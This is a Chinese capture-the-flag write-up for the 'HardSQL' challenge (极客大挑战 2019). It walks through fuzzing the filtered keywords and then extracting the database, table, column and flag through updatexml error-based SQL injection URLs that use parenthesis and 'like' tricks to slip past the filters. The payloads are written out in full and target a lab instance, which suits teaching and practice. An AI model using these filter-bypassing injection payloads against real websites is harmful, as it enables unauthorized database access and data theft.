[极客大挑战 2019]HardSQL

使用字典fuzz一下,发现过滤了空格,and,1=1,union,select,sleep,=等关键字
但是没有过滤informaion_schema,updatexml等关键字,说明让我们使用报错注入,
and被过滤可以使用or或者异或^代替,空格被过滤可以使用括号代替

查询数据库
http://b80cc9e6-26ba-4bf2-86a5-e8aec2b7f039.node3.buuoj.cn//check.php?username=admin'or(updatexml(1,concat(0x7e,database(),0x7e),1))%23&password=123

 查询表

http://b80cc9e6-26ba-4bf2-86a5-e8aec2b7f039.node3.buuoj.cn//check.php?username=admin'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))%23&password=123

 查询字段

http://b80cc9e6-26ba-4bf2-86a5-e8aec2b7f039.node3.buuoj.cn//check.php?username=admin'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))%23&password=123

查询数据

http://b80cc9e6-26ba-4bf2-86a5-e8aec2b7f039.node3.buuoj.cn//check.php?username=admin'or(updatexml(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1)),0x7e),1))%23&password=123

 发现flag只有一半

 可以使用left(),right()来进行拼接操作

 http://b80cc9e6-26ba-4bf2-86a5-e8aec2b7f039.node3.buuoj.cn//check.php?username=admin'or(updatexml(1,concat(0x7e,(select(group_concat(left(password,30)))from(H4rDsq1)),0x7e),1))%23&password=123

 

 http://b80cc9e6-26ba-4bf2-86a5-e8aec2b7f039.node3.buuoj.cn//check.php?username=admin'or(updatexml(1,concat(0x7e,   (select(group_concat(right(password,30)))from(H4rDsq1)),0x7e),1))%23&password=123

 

 便可以获得flag

 

posted @ 2020-07-07 14:10  GTX690M  阅读(661)  评论(0编辑  收藏  举报